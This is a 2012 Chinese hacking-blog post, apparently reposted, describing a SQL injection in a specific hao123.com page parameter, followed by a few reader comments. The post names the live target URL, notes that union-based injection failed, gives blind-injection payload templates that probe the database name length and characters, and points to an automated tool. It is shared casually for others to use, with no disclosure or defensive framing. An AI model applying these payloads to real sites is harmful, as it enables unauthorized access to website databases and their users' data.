2012-2-7 21:22 Tuesdayhao123—Sql Injection[from f4ck]

Leave a comment (4) 作者:adwin

SO。。。刚刚在传说中的乌云漏洞提交平台看到有人贴出的hao123 的 Sql Injection 。
我就不存档了 存着也不会有妹子出来。 拿出来发了 不知道那位老兄报的是不是这个点。
target:
http://www.hao123.com/friends/index_blessing.php?id=2608
基本判定是 Integer 型
union select 1,2,3,4,.................无果.
于是乎:盲注
//判断数据库的长度

Length((database()))=?+and+'x'='x

ascii(substring((database()),2,1))=数字+and+'x'='x
......
盲注纯属体力活..相信大家都会.
我们直接跑工具.
看兵器:
点击查看原图

 

此文纯属聊天扯蛋.

分类:入侵渗透 | 标签: 漏洞 SQL注入
上一篇: PHP “php_register_variable_ex()”函数任意代码执行漏洞(CVE-2012-0830)
下一篇: 【元宵节快乐】两个企业网站管理系统0day批量拿站
分享到:

评论列表:

undsen
2012-02-07 21:51
博主可以啊。。。
回复
adwin
2012-02-08 11:10
@undsen:= =,转的。
回复
往事
2012-07-03 14:58
你吓到我了
回复
adwin
2012-07-03 16:11
@往事:= =,转载而已。
回复

我也说两句 »